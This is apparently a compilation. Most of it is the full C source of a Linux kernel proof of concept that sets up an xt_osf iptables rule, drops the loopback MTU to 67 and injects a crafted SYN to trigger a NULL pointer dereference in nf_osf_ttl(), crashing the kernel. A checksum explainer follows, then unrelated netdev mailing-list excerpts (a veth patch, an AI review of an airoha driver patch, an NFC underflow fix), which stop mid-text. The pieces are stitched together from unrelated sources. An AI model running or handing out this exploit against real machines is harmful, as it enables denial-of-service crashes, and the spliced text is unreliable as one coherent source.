#define NFNETLINK_V0 0
#define NFNL_SUBSYS_OSF 5
struct nfgenmsg {
__u8 nfgen_family;
__u8 version;
__be16 res_id;
};
/* OSF netlink */
#define OSF_MSG_ADD 0
#define OSF_ATTR_FINGER 1
#define MAXGENRELEN 32
#define MAX_IPOPTLEN 40
#define OSF_WSS_PLAIN 0
struct nf_osf_wc {
__u32 wc;
__u32 val;
};
struct nf_osf_opt {
__u16 kind;
__u16 length;
struct nf_osf_wc wc;
};
struct nf_osf_user_finger {
struct nf_osf_wc wss;
__u8 ttl;
__u8 df;
__u16 ss;
__u16 mss;
__u16 opt_num;
char genre[MAXGENRELEN];
char version[MAXGENRELEN];
char subtype[MAXGENRELEN];
struct nf_osf_opt opt[MAX_IPOPTLEN];
};
/* iptables / x_tables */
#define XT_TABLE_MAXNAMELEN 32
#define XT_EXTENSION_MAXNAMELEN 29
#define XT_FUNCTION_MAXNAMELEN 30
#define NF_INET_PRE_ROUTING 0
#define NF_INET_LOCAL_OUT 3
#define NF_INET_NUMHOOKS 5
#define NF_ACCEPT 1
#ifndef IPPROTO_TCP /* glibc's <netinet/in.h> already provides it */
#define IPPROTO_TCP 6
#endif
#define IPT_SO_SET_REPLACE 64
#define IPT_SO_GET_INFO 64
#define SOL_IP 0
/* XT_ALIGN: align to 8 bytes (alignof struct with u64 member) */
#define XT_ALIGN(s) (((s) + 7) & ~7)
struct xt_counters {
__u64 pcnt, bcnt;
};
struct ipt_ip {
struct in_addr src, dst;
struct in_addr smsk, dmsk;
char iniface[16], outiface[16];
unsigned char iniface_mask[16], outiface_mask[16];
__u16 proto;
__u8 flags;
__u8 invflags;
};
struct ipt_entry {
struct ipt_ip ip;
unsigned int nfcache;
__u16 target_offset;
__u16 next_offset;
unsigned int comefrom;
struct xt_counters counters;
unsigned char elems[0];
};
struct xt_entry_match {
union {
struct {
__u16 match_size;
char name[XT_EXTENSION_MAXNAMELEN];
__u8 revision;
} user;
__u16 match_size;
} u;
unsigned char data[0];
};
struct xt_entry_target {
union {
struct {
__u16 target_size;
char name[XT_EXTENSION_MAXNAMELEN];
__u8 revision;
} user;
__u16 target_size;
} u;
unsigned char data[0];
};
struct xt_standard_target {
struct xt_entry_target target;
int verdict;
};
struct xt_error_target {
struct xt_entry_target target;
char errorname[XT_FUNCTION_MAXNAMELEN];
};
struct ipt_getinfo {
char name[XT_TABLE_MAXNAMELEN];
unsigned int valid_hooks;
unsigned int hook_entry[NF_INET_NUMHOOKS];
unsigned int underflow[NF_INET_NUMHOOKS];
unsigned int num_entries;
unsigned int size;
};
struct ipt_replace {
char name[XT_TABLE_MAXNAMELEN];
unsigned int valid_hooks;
unsigned int num_entries;
unsigned int size;
unsigned int hook_entry[NF_INET_NUMHOOKS];
unsigned int underflow[NF_INET_NUMHOOKS];
unsigned int num_counters;
struct xt_counters *counters;
/* entries follow */
};
/* nf_osf_info — iptables match data for xt_osf */
#define NF_OSF_GENRE (1 << 0)
#define NF_OSF_TTL_FLAG (1 << 1) /* NF_OSF_TTL in the kernel */
#define NF_OSF_TTL_LESS 1
struct nf_osf_info {
	char genre[MAXGENRELEN];
	__u32 len;
	__u32 flags;
	__u32 loglevel;
	__u32 ttl;
};
/* IP / TCP headers for packet crafting */
struct iphdr {
#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
	__u8 ihl:4, version:4;
#else
	__u8 version:4, ihl:4;
#endif
	__u8 tos;
	__u16 tot_len;
	__u16 id;
	__u16 frag_off;
	__u8 ttl;
	__u8 protocol;
	__u16 check;
	__u32 saddr;
	__u32 daddr;
};

struct tcphdr {
	__u16 source;
	__u16 dest;
	__u32 seq;
	__u32 ack_seq;
#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__
	__u16 res1:4, doff:4, fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1;
#else
	__u16 doff:4, res1:4, cwr:1, ece:1, urg:1, ack:1, psh:1, rst:1, syn:1, fin:1;
#endif
	__u16 window;
	__u16 check;
	__u16 urg_ptr;
};
/* AF_PACKET / Ethernet */
#ifndef AF_PACKET
#define AF_PACKET 17
#endif
#define ETH_P_IP 0x0800
#define ETH_P_ALL 0x0003
#define ETH_HLEN 14
#define ETH_ALEN 6
struct sockaddr_ll {
	unsigned short sll_family;
	__be16 sll_protocol;
	int sll_ifindex;
	unsigned short sll_hatype;
	unsigned char sll_pkttype;
	unsigned char sll_halen;
	unsigned char sll_addr[8];
};
/* ------------------------------------------------------------------ */
/* Helpers */
/* ------------------------------------------------------------------ */
#define DIE(fmt, ...) do { \
	fprintf(stderr, "[-] " fmt "\n", ##__VA_ARGS__); \
	exit(1); \
} while (0)
#define LOG(fmt, ...) fprintf(stderr, "[*] " fmt "\n", ##__VA_ARGS__)

static __u16 ip_checksum(const void *buf, int len)
{
	const __u16 *p = buf;
	__u32 sum = 0;

	while (len > 1) {
		sum += *p++;
		len -= 2;
	}
	if (len == 1)
		sum += *(__u8 *)p;
	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);
	return (__u16)~sum;
}
/* ------------------------------------------------------------------ */
/* Step 1: Load OSF fingerprint via nfnetlink */
/* ------------------------------------------------------------------ */
static void load_osf_fingerprint(void)
{
	int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER);
	if (fd < 0)
		DIE("socket(NETLINK_NETFILTER): %s", strerror(errno));
	struct sockaddr_nl addr = { .nl_family = AF_NETLINK };
	if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0)
		DIE("bind(netlink): %s", strerror(errno));

	struct nf_osf_user_finger finger;
	memset(&finger, 0, sizeof(finger));
	finger.wss.wc = OSF_WSS_PLAIN;
	finger.wss.val = 0;
	finger.ttl = 64;
	finger.df = 0;
	finger.ss = 40;
	finger.mss = 0;
	finger.opt_num = 0;
	strncpy(finger.genre, "Linux", MAXGENRELEN);

	int finger_attr_len = NLA_HDRLEN + sizeof(finger);
	int nfmsg_len = NLMSG_ALIGN(sizeof(struct nfgenmsg)) + NLA_ALIGN(finger_attr_len);
	int total_len = NLMSG_LENGTH(nfmsg_len);
	char *buf = calloc(1, total_len);
	if (!buf) DIE("calloc");

	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
	nlh->nlmsg_len = total_len;
	nlh->nlmsg_type = (NFNL_SUBSYS_OSF << 8) | OSF_MSG_ADD;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_ACK;
	nlh->nlmsg_seq = 1;
	nlh->nlmsg_pid = getpid();

	struct nfgenmsg *nfg = (struct nfgenmsg *)(buf + NLMSG_HDRLEN);
	nfg->nfgen_family = AF_UNSPEC;
	nfg->version = NFNETLINK_V0;
	nfg->res_id = 0;

	struct nlattr *nla = (struct nlattr *)(buf + NLMSG_HDRLEN +
					       NLMSG_ALIGN(sizeof(struct nfgenmsg)));
	nla->nla_len = finger_attr_len;
	nla->nla_type = OSF_ATTR_FINGER;
	memcpy((char *)nla + NLA_HDRLEN, &finger, sizeof(finger));

	struct sockaddr_nl dest = { .nl_family = AF_NETLINK };
	if (sendto(fd, buf, total_len, 0,
		   (struct sockaddr *)&dest, sizeof(dest)) < 0)
		DIE("sendto(OSF_MSG_ADD): %s", strerror(errno));

	char rbuf[4096];
	ssize_t n = recv(fd, rbuf, sizeof(rbuf), 0);
	if (n < 0)
		DIE("recv(netlink): %s", strerror(errno));
	/* The ACK must hold at least an nlmsghdr plus the error code. */
	if (n < (ssize_t)(NLMSG_HDRLEN + sizeof(int)))
		DIE("recv(netlink): short reply (%zd bytes)", n);
	struct nlmsghdr *rnlh = (struct nlmsghdr *)rbuf;
	if (rnlh->nlmsg_type == NLMSG_ERROR) {
		int *errp = (int *)(rbuf + NLMSG_HDRLEN);
		if (*errp != 0)
			DIE("OSF fingerprint load failed: %s (err=%d)",
			    strerror(-*errp), *errp);
	}
	LOG("OSF fingerprint loaded (genre=Linux, ttl=64, ss=40, df=0)");
	free(buf);
	close(fd);
}
/* ------------------------------------------------------------------ */
/* Step 2: Set up iptables raw table with xt_osf match */
/* ------------------------------------------------------------------ */
#define SIZEOF_IPT_ENTRY (XT_ALIGN(sizeof(struct ipt_entry)))
#define SIZEOF_MATCH_OSF (XT_ALIGN(sizeof(struct xt_entry_match) + sizeof(struct nf_osf_info)))
#define SIZEOF_STD_TARGET (XT_ALIGN(sizeof(struct xt_standard_target)))
#define SIZEOF_ERR_TARGET (XT_ALIGN(sizeof(struct xt_error_target)))
#define ENTRY0_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_MATCH_OSF + SIZEOF_STD_TARGET)
#define ENTRY1_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_STD_TARGET)
#define ENTRY2_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_STD_TARGET)
#define ENTRY3_SIZE (SIZEOF_IPT_ENTRY + SIZEOF_ERR_TARGET)
#define ENTRIES_SIZE (ENTRY0_SIZE + ENTRY1_SIZE + ENTRY2_SIZE + ENTRY3_SIZE)
static void setup_iptables_osf(void)
{
	int rawfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
	if (rawfd < 0)
		DIE("socket(RAW): %s", strerror(errno));

	struct ipt_getinfo info;
	memset(&info, 0, sizeof(info));
	strncpy(info.name, "raw", XT_TABLE_MAXNAMELEN);
	socklen_t optlen = sizeof(info);
	if (getsockopt(rawfd, SOL_IP, IPT_SO_GET_INFO, &info, &optlen) < 0)
		DIE("getsockopt(IPT_SO_GET_INFO): %s", strerror(errno));
	LOG("raw table: valid_hooks=0x%x, num_entries=%u, size=%u",
	    info.valid_hooks, info.num_entries, info.size);
	unsigned int old_num_entries = info.num_entries;

	size_t repl_size = sizeof(struct ipt_replace) + ENTRIES_SIZE;
	char *blob = calloc(1, repl_size);
	if (!blob) DIE("calloc");
	struct ipt_replace *repl = (struct ipt_replace *)blob;
	strncpy(repl->name, "raw", XT_TABLE_MAXNAMELEN);
	repl->valid_hooks = (1 << NF_INET_PRE_ROUTING) | (1 << NF_INET_LOCAL_OUT);
	repl->num_entries = 4;
	repl->size = ENTRIES_SIZE;

	unsigned int off0 = 0;
	unsigned int off1 = ENTRY0_SIZE;
	unsigned int off2 = ENTRY0_SIZE + ENTRY1_SIZE;
	unsigned int off3 = ENTRY0_SIZE + ENTRY1_SIZE + ENTRY2_SIZE;
	repl->hook_entry[NF_INET_PRE_ROUTING] = off0;
	repl->hook_entry[NF_INET_LOCAL_OUT] = off2;
	repl->underflow[NF_INET_PRE_ROUTING] = off1;
	repl->underflow[NF_INET_LOCAL_OUT] = off2;
	repl->num_counters = old_num_entries;
	struct xt_counters *ctrs = calloc(old_num_entries, sizeof(struct xt_counters));
	if (!ctrs) DIE("calloc counters");
	repl->counters = ctrs;
	char *entries = blob + sizeof(struct ipt_replace);

	/* Entry 0: OSF match rule in PREROUTING */
	{
		struct ipt_entry *e = (struct ipt_entry *)(entries + off0);
		memset(e, 0, SIZEOF_IPT_ENTRY);
		e->ip.proto = IPPROTO_TCP;
		e->target_offset = SIZEOF_IPT_ENTRY + SIZEOF_MATCH_OSF;
		e->next_offset = ENTRY0_SIZE;
		struct xt_entry_match *m = (struct xt_entry_match *)(entries + off0 + SIZEOF_IPT_ENTRY);
		memset(m, 0, SIZEOF_MATCH_OSF);
		m->u.user.match_size = SIZEOF_MATCH_OSF;
		strncpy(m->u.user.name, "osf", XT_EXTENSION_MAXNAMELEN);
		m->u.user.revision = 0;
		struct nf_osf_info *osf = (struct nf_osf_info *)m->data;
		memset(osf, 0, sizeof(*osf));
		strncpy(osf->genre, "Linux", MAXGENRELEN);
		osf->flags = NF_OSF_GENRE | NF_OSF_TTL_FLAG;
		osf->ttl = NF_OSF_TTL_LESS;
		struct xt_standard_target *t = (struct xt_standard_target *)
			(entries + off0 + e->target_offset);
		memset(t, 0, SIZEOF_STD_TARGET);
		t->target.u.user.target_size = SIZEOF_STD_TARGET;
		t->verdict = -NF_ACCEPT - 1;
	}
	/* Entry 1: PREROUTING policy (underflow) */
	{
		struct ipt_entry *e = (struct ipt_entry *)(entries + off1);
		memset(e, 0, SIZEOF_IPT_ENTRY);
		e->target_offset = SIZEOF_IPT_ENTRY;
		e->next_offset = ENTRY1_SIZE;
		struct xt_standard_target *t = (struct xt_standard_target *)
			(entries + off1 + SIZEOF_IPT_ENTRY);
		memset(t, 0, SIZEOF_STD_TARGET);
		t->target.u.user.target_size = SIZEOF_STD_TARGET;
		t->verdict = -NF_ACCEPT - 1;
	}
	/* Entry 2: OUTPUT policy (underflow) */
	{
		struct ipt_entry *e = (struct ipt_entry *)(entries + off2);
		memset(e, 0, SIZEOF_IPT_ENTRY);
		e->target_offset = SIZEOF_IPT_ENTRY;
		e->next_offset = ENTRY2_SIZE;
		struct xt_standard_target *t = (struct xt_standard_target *)
			(entries + off2 + SIZEOF_IPT_ENTRY);
		memset(t, 0, SIZEOF_STD_TARGET);
		t->target.u.user.target_size = SIZEOF_STD_TARGET;
		t->verdict = -NF_ACCEPT - 1;
	}
	/* Entry 3: ERROR target */
	{
		struct ipt_entry *e = (struct ipt_entry *)(entries + off3);
		memset(e, 0, SIZEOF_IPT_ENTRY);
		e->target_offset = SIZEOF_IPT_ENTRY;
		e->next_offset = ENTRY3_SIZE;
		struct xt_error_target *t = (struct xt_error_target *)
			(entries + off3 + SIZEOF_IPT_ENTRY);
		memset(t, 0, SIZEOF_ERR_TARGET);
		t->target.u.user.target_size = SIZEOF_ERR_TARGET;
		strncpy(t->target.u.user.name, "ERROR", XT_EXTENSION_MAXNAMELEN);
		strncpy(t->errorname, "ERROR", XT_FUNCTION_MAXNAMELEN);
	}

	LOG("Replacing raw table: %u entries, %u bytes", repl->num_entries, repl->size);
	if (setsockopt(rawfd, SOL_IP, IPT_SO_SET_REPLACE, blob, repl_size) < 0)
		DIE("setsockopt(IPT_SO_SET_REPLACE): %s (errno=%d)",
		    strerror(errno), errno);
	LOG("iptables raw table replaced with OSF match rule");
	free(ctrs);
	free(blob);
	close(rawfd);
}
/* ------------------------------------------------------------------ */
/* Step 3: Destroy lo's in_dev via MTU trick */
/* ------------------------------------------------------------------ */
/*
 * The loopback driver (loopback.c) uses gen_lo_setup(), which does NOT call
 * ether_setup(), so dev->min_mtu stays at the default 0.
 * This allows setting the MTU below IPV4_MIN_MTU (68).
 *
 * Setting the MTU to 67 triggers:
 *   NETDEV_CHANGEMTU → !inetdev_valid_mtu(67)
 *     → fallthrough → inetdev_destroy(in_dev)
 *     → RCU_INIT_POINTER(dev->ip_ptr, NULL)
 */
static void setup_loopback(void)
{
	int sfd = socket(AF_INET, SOCK_DGRAM, 0);
	if (sfd < 0) DIE("socket(DGRAM): %s", strerror(errno));
	struct ifreq ifr;
	memset(&ifr, 0, sizeof(ifr));
	strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
	ifr.ifr_mtu = 67;
	if (ioctl(sfd, SIOCSIFMTU, &ifr) < 0)
		DIE("ioctl(SIOCSIFMTU lo 67): %s", strerror(errno));
	close(sfd);
	LOG("lo: MTU set to 67 → inetdev_destroy → ip_ptr = NULL");
}
/* ------------------------------------------------------------------ */
/* Step 4: Inject crafted SYN packet via AF_PACKET on lo */
/* ------------------------------------------------------------------ */
static void inject_syn(void)
{
	/*
	 * lo ifindex is always LOOPBACK_IFINDEX = 1,
	 * but we look it up to be safe.
	 */
	int sfd = socket(AF_INET, SOCK_DGRAM, 0);
	if (sfd < 0) DIE("socket(DGRAM): %s", strerror(errno));
	struct ifreq ifr;
	memset(&ifr, 0, sizeof(ifr));
	strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
	if (ioctl(sfd, SIOCGIFINDEX, &ifr) < 0)
		DIE("SIOCGIFINDEX(lo): %s", strerror(errno));
	int ifindex = ifr.ifr_ifindex;
	close(sfd);
	LOG("lo: ifindex=%d", ifindex);

	int pfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
	if (pfd < 0)
		DIE("socket(AF_PACKET): %s", strerror(errno));

	/*
	 * 54-byte Ethernet frame: [14 ETH][20 IP][20 TCP]
	 *
	 * loopback_xmit() calls eth_type_trans(skb, dev) which:
	 *   - Strips ETH header, sets skb->protocol from EtherType
	 *   - Sets pkt_type based on DST MAC vs dev MAC
	 *   - lo MAC = 00:00:00:00:00:00 → DST=all-zeros → PACKET_HOST
	 * Then calls __netif_rx(skb) → RX path → ip_rcv → PREROUTING.
	 *
	 * IP:  TTL=255 > fingerprint TTL(64) → takes TTL_LESS path in nf_osf_ttl
	 *      DF=0 → matches fingerprint df=0 → nf_osf_fingers[0]
	 *      tot_len=40 → matches fingerprint ss=40
	 * TCP: SYN=1, doff=5, no options → matches opt_num=0
	 */
	char frame[54];
	memset(frame, 0, sizeof(frame));

	/* Ethernet header: DST=00:00:00:00:00:00 (lo MAC → PACKET_HOST) */
	unsigned char *eth = (unsigned char *)frame;
	/* DST already zero from memset */
	eth[ETH_ALEN + 5] = 0x01; /* SRC: 00:00:00:00:00:01 */
	eth[12] = (ETH_P_IP >> 8) & 0xff; /* EtherType: 0x0800 (IPv4) */
	eth[13] = ETH_P_IP & 0xff;

	/* IP header */
	struct iphdr *ip = (struct iphdr *)(frame + ETH_HLEN);
	ip->version = 4;
	ip->ihl = 5;
	ip->tot_len = htons(40);
	ip->id = htons(0x1234);
	ip->frag_off = 0; /* DF=0 */
	ip->ttl = 255; /* > fingerprint TTL 64 */
	ip->protocol = IPPROTO_TCP;
	ip->saddr = inet_addr("10.0.0.2");
	ip->daddr = inet_addr("10.0.0.1");
	ip->check = 0;
	ip->check = ip_checksum(ip, 20);

	/* TCP header */
	struct tcphdr *tcp = (struct tcphdr *)(frame + ETH_HLEN + 20);
	tcp->source = htons(12345);
	tcp->dest = htons(80);
	tcp->seq = htonl(0xdeadbeef);
	tcp->doff = 5; /* no TCP options */
	tcp->syn = 1;
	tcp->window = htons(1024);

	LOG("Injecting SYN via lo: TTL=255, DF=0, tot_len=40, SYN");
	LOG("Crash path: AF_PACKET → loopback_xmit → __netif_rx");
	LOG(" → ip_rcv(lo) → NF_INET_PRE_ROUTING → xt_osf");
	LOG(" → nf_osf_ttl: __in_dev_get_rcu(lo) = NULL → CRASH");

	struct sockaddr_ll sll;
	memset(&sll, 0, sizeof(sll));
	sll.sll_family = AF_PACKET;
	sll.sll_protocol = htons(ETH_P_IP);
	sll.sll_ifindex = ifindex;
	sll.sll_halen = ETH_ALEN;
	/* sll_addr left as zeros (matching lo MAC) */
	ssize_t n = sendto(pfd, frame, sizeof(frame), 0,
			   (struct sockaddr *)&sll, sizeof(sll));
	if (n < 0)
		DIE("sendto(AF_PACKET): %s", strerror(errno));
	LOG("Packet injected (%zd bytes), waiting for kernel crash...", n);
	close(pfd);
}
/* ------------------------------------------------------------------ */
/* main */
/* ------------------------------------------------------------------ */
int main(void)
{
	LOG("=== nf_osf_ttl() NULL pointer dereference PoC ===");
	LOG("Method: loopback MTU trick (MTU=67 < 68 → inetdev_destroy)");

	/* Step 1: Load OSF fingerprint */
	load_osf_fingerprint();
	/* Step 2: Set up iptables raw table with OSF match */
	setup_iptables_osf();
	/* Step 3: Destroy lo's in_dev by setting MTU < IPV4_MIN_MTU */
	setup_loopback();
	/* Step 4: Inject SYN packet → triggers NULL deref */
	inject_syn();

	/* If we reach here, the bug didn't trigger */
	sleep(3);
	LOG("No crash detected — bug may be patched in this kernel.");
	return 1;
}
```
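The PoC computes the IPv4 header checksum itself because the IPv4 receive path (ip_rcv_core() in current kernels) drops packets whose header checksum does not verify, so the SYN would otherwise never reach PREROUTING. The sketch below isolates that RFC 1071 arithmetic. It works on raw network-order bytes, so it does not depend on host endianness, and the byte values reproduce the header that inject_syn() builds (ihl=5, tot_len=40, id=0x1234, TTL=255, TCP, 10.0.0.2 to 10.0.0.1). The names csum16_be(), syn_iphdr and fill_and_verify() are illustrative only and are not part of the PoC.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * RFC 1071 Internet checksum over a buffer of network-order bytes.
 * Returns the checksum as a host-order 16-bit value.
 */
static uint16_t csum16_be(const uint8_t *buf, size_t len)
{
	uint32_t sum = 0;

	/* Add 16-bit big-endian words. */
	while (len > 1) {
		sum += ((uint32_t)buf[0] << 8) | buf[1];
		buf += 2;
		len -= 2;
	}
	/* An odd trailing byte is padded with a zero low byte. */
	if (len == 1)
		sum += (uint32_t)buf[0] << 8;

	/* Fold carries back into the low 16 bits. */
	while (sum >> 16)
		sum = (sum & 0xffff) + (sum >> 16);

	return (uint16_t)~sum;
}

/* The 20-byte IPv4 header built by inject_syn(), checksum field zeroed. */
static uint8_t syn_iphdr[20] = {
	0x45, 0x00, 0x00, 0x28, /* version 4, ihl 5, tos 0, tot_len 40 */
	0x12, 0x34, 0x00, 0x00, /* id 0x1234, frag_off 0 (DF=0) */
	0xff, 0x06, 0x00, 0x00, /* ttl 255, protocol TCP, check (zero) */
	0x0a, 0x00, 0x00, 0x02, /* saddr 10.0.0.2 */
	0x0a, 0x00, 0x00, 0x01, /* daddr 10.0.0.1 */
};

/* Store the checksum in bytes 10-11, then return the re-check (0 if valid). */
static uint16_t fill_and_verify(void)
{
	uint16_t c = csum16_be(syn_iphdr, sizeof(syn_iphdr));

	syn_iphdr[10] = c >> 8;
	syn_iphdr[11] = c & 0xff;
	return csum16_be(syn_iphdr, sizeof(syn_iphdr));
}
```

Re-running the checksum over a header that already carries a valid checksum yields 0, which is the property the receiver checks. The PoC's ip_checksum() instead sums native-endian 16-bit words and stores the result the same way; RFC 1071 notes that the one's-complement sum is byte-order independent, so both approaches put the same bytes on the wire.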
* Re: [syzbot ci] Re: veth: add Byte Queue Limits (BQL) support
From: Aleksandr Nogikh @ 2026-04-14 8:33 UTC
To: syzbot+cib904ea9ebb647254, hawk
Cc: netdev, linux-kernel, syzkaller-bugs, syzbot
In-Reply-To: <69dd48c2.a00a0220.468cb.004e.GAE@google.com>
(Forgot to Cc the right list.)
Hmm, I just fixed a problem that may have affected `syz test` processing;
let's try again:
#syz test
---
drivers/net/veth.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/drivers/net/veth.c b/drivers/net/veth.c
index 911e7e36e166..9d7b085c9548 100644
--- a/drivers/net/veth.c
+++ b/drivers/net/veth.c
@@ -1138,7 +1138,9 @@ static void veth_napi_del_range(struct net_device *dev, int start, int end)
*/
peer = rtnl_dereference(priv->peer);
if (peer) {
- for (i = start; i < end; i++)
+ int peer_end = min(end, (int)peer->real_num_tx_queues);
+
+ for (i = start; i < peer_end; i++)
netdev_tx_reset_queue(netdev_get_tx_queue(peer, i));
}
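The hunk bounds the BQL reset loop by the peer's real_num_tx_queues, so the loop no longer touches a peer TX queue index at or beyond that count, even when [start, end) is larger. A user-space model of just that clamping follows; reset_peer_queues() and min_int() are hypothetical helpers, the function counts resets instead of calling netdev_tx_reset_queue(), and peer_txqs stands in for peer->real_num_tx_queues.

```c
/* Plain integer minimum, standing in for the kernel's min(). */
static int min_int(int a, int b)
{
	return a < b ? a : b;
}

/*
 * Model of the patched loop: visit queues in [start, end), but never at or
 * beyond peer_txqs. Returns how many queues would be reset.
 */
static int reset_peer_queues(int start, int end, int peer_txqs)
{
	int peer_end = min_int(end, peer_txqs);
	int resets = 0;
	int i;

	for (i = start; i < peer_end; i++)
		resets++; /* netdev_tx_reset_queue(netdev_get_tx_queue(peer, i)) */
	return resets;
}
```

For example, a range of [0, 8) against a peer with 4 TX queues resets only queues 0 to 3, and a range that starts past the peer's last queue resets nothing.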
* Re: [net-next] net: airoha: Wait for TX to complete in airoha_dev_stop()
From: Paolo Abeni @ 2026-04-14 8:29 UTC
To: lorenzo
Cc: edumazet, kuba, davem, netdev, andrew+netdev, pabeni,
linux-arm-kernel, linux-mediatek
In-Reply-To: <20260411-airoha-fix-ndo_stop-v1-1-caddaa181739@kernel.org>
This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
For local reproduction steps see https://netdev-ai.bots.linux.dev/ai-local.html
---
net: airoha: Wait for TX to complete in airoha_dev_stop()
Wait for TX to complete in the airoha_dev_stop() routine before stopping
the TX DMA and running the airoha_qdma_cleanup_tx_queue() routine.
Moreover, start/stop the TX/RX NAPIs in the ndo_open()/ndo_stop()
callbacks to be sure the TX NAPIs have completed before the TX DMA engine
is stopped in the airoha_dev_stop() routine.
> diff --git a/drivers/net/ethernet/airoha/airoha_eth.c b/drivers/net/ethernet/airoha/airoha_eth.c
> index 8e4b043af4bc..9e40c8f375c1 100644
> --- a/drivers/net/ethernet/airoha/airoha_eth.c
> +++ b/drivers/net/ethernet/airoha/airoha_eth.c
[ ... ]
> @@ -1684,18 +1686,26 @@ static int airoha_dev_stop(struct net_device *dev)
> struct airoha_qdma *qdma = port->qdma;
> int i, err;
>
> - netif_tx_disable(dev);
> err = airoha_set_vip_for_gdm_port(port, false);
> if (err)
> return err;
>
> - for (i = 0; i < ARRAY_SIZE(qdma->q_tx); i++)
> - netdev_tx_reset_subqueue(dev, i);
> -
> airoha_set_gdm_port_fwd_cfg(qdma->eth, REG_GDM_FWD_CFG(port->id),
> FE_PSE_PORT_DROP);
>
> + netif_tx_disable(dev);
> if (atomic_dec_and_test(&qdma->users)) {
> + u32 val;
> +
> + /* Wait for TX to complete */
> + err = read_poll_timeout(airoha_qdma_rr, val,
> + !(val & GLOBAL_CFG_TX_DMA_BUSY_MASK),
> + USEC_PER_MSEC, 100 * USEC_PER_MSEC,
> + false, qdma, REG_QDMA_GLOBAL_CFG);
> + if (err)
> + return err;
> ^^^^^^^^^^
Can this leave the device in an inconsistent state? When read_poll_timeout()
fails (TX DMA busy for more than 100ms), airoha_dev_stop() returns an error
immediately. However, by that point atomic_dec_and_test(&qdma->users) has
already decremented qdma->users to 0, while airoha_qdma_stop_napi() has not
been called, so all NAPIs remain enabled.
The networking core (__dev_close_many in net/core/dev.c) ignores the
ndo_stop return value and marks the device as down regardless. When the
device is later brought up again, airoha_dev_open() sees atomic_fetch_inc()
return 0 (old value) and calls airoha_qdma_start_napi() -> napi_enable(),
which hits BUG_ON(!test_bit(NAPI_STATE_SCHED, &val)) in napi_enable_locked()
because the NAPI was never disabled.
The early return also skips the netdev_tx_reset_subqueue() calls at the end
of the function.
Should the code either continue with cleanup on timeout (don't return), or
ensure NAPI and DMA state are properly cleaned up before returning?
> +
> + airoha_qdma_stop_napi(qdma);
> airoha_qdma_clear(qdma, REG_QDMA_GLOBAL_CFG,
> GLOBAL_CFG_TX_DMA_EN_MASK |
> GLOBAL_CFG_RX_DMA_EN_MASK);
[ ... ]
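To make the reviewer's scenario concrete, here is a user-space model contrasting the early return with the first option raised above (carry on with teardown after a timeout). Everything in it is hypothetical: struct fake_qdma, dev_stop(), dev_stop_early_return() and dev_open() track only the users count and whether NAPI is enabled, the poll outcome is passed in as a flag, and dev_open() returns false where the real driver would hit the BUG_ON() in napi_enable_locked(). It is not airoha driver code.

```c
#include <errno.h>
#include <stdbool.h>

struct fake_qdma {
	int users;         /* stands in for atomic_t qdma->users */
	bool napi_enabled; /* NAPI state for all queues */
	bool dma_enabled;  /* GLOBAL_CFG_{TX,RX}_DMA_EN */
};

/* Patch as posted: a poll timeout returns before NAPI is stopped. */
static int dev_stop_early_return(struct fake_qdma *q, bool tx_dma_idle)
{
	if (--q->users == 0) {
		if (!tx_dma_idle)
			return -ETIMEDOUT; /* NAPI left enabled */
		q->napi_enabled = false;
		q->dma_enabled = false;
	}
	return 0;
}

/* Alternative: report the timeout, but always finish the teardown. */
static int dev_stop(struct fake_qdma *q, bool tx_dma_idle)
{
	int err = 0;

	if (--q->users == 0) {
		if (!tx_dma_idle)
			err = -ETIMEDOUT;
		q->napi_enabled = false; /* airoha_qdma_stop_napi() */
		q->dma_enabled = false;  /* clear the DMA enable bits */
	}
	return err;
}

/* Returns false where the real driver would enable an already-enabled NAPI. */
static bool dev_open(struct fake_qdma *q)
{
	if (q->users++ == 0) {
		if (q->napi_enabled)
			return false;
		q->napi_enabled = true;
		q->dma_enabled = true;
	}
	return true;
}
```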
* Re: [PATCH net v2 1/3] nfc: nci: fix u8 underflow in nci_store_general_bytes_nfc_dep
From: Simon Horman @ 2026-04-14 8:28 UTC
To: Lekë Hapçiu
Cc: netdev, davem, edumazet, kuba, pabeni, linux-nfc, stable,
Lekë Hapçiu
In-Reply-To: <20260409185958.1821242-2-snowwlake@icloud.com>
On Thu, Apr 09, 2026 at 08:59:56PM +0200, Lekë Hapçiu wrote:
> From: Lekë Hapçiu <framemain@outlook.com>
>
> nci_store_general_bytes_nfc_dep() computes the number of General Bytes
> to copy from an ATR_RES or ATR_REQ frame by subtracting a fixed header
> offset from the peer-supplied length field:
>
> ndev->remote_gb_len = min_t(__u8,
> (atr_res_len - NFC_ATR_RES_GT_OFFSET), /* offset = 15 */
> NFC_ATR_RES_GB_MAXSIZE);
>
> Both length fields are __u8. When a malicious NFC-DEP target (POLL mode)
> or initiator (LISTEN mode) sends an ATR_RES/ATR_REQ whose length field is
> smaller than the fixed offset (< 15 or < 14 respectively), the subtraction
> wraps in unsigned u8 arithmetic:
>
> e.g. atr_res_len = 0 -> (u8)(0 - 15) = 241
>
> min_t(__u8, 241, 47) then yields 47, so the subsequent memcpy reads
> 47 bytes from beyond the end of the valid activation parameter data into
> ndev->remote_gb[]. This buffer is later passed to nfc_llcp_parse_gb_tlv()
> as a TLV array, feeding directly into the TLV parser hardened by the
> companion patch.
>
> Fix: add an explicit lower-bound check on each length field before the
> subtraction. If the length is smaller than the required offset the frame
> is malformed; leave remote_gb_len at zero and skip the memcpy.
>
> Both the POLL (atr_res_len / NFC_ATR_RES_GT_OFFSET = 15) and the LISTEN
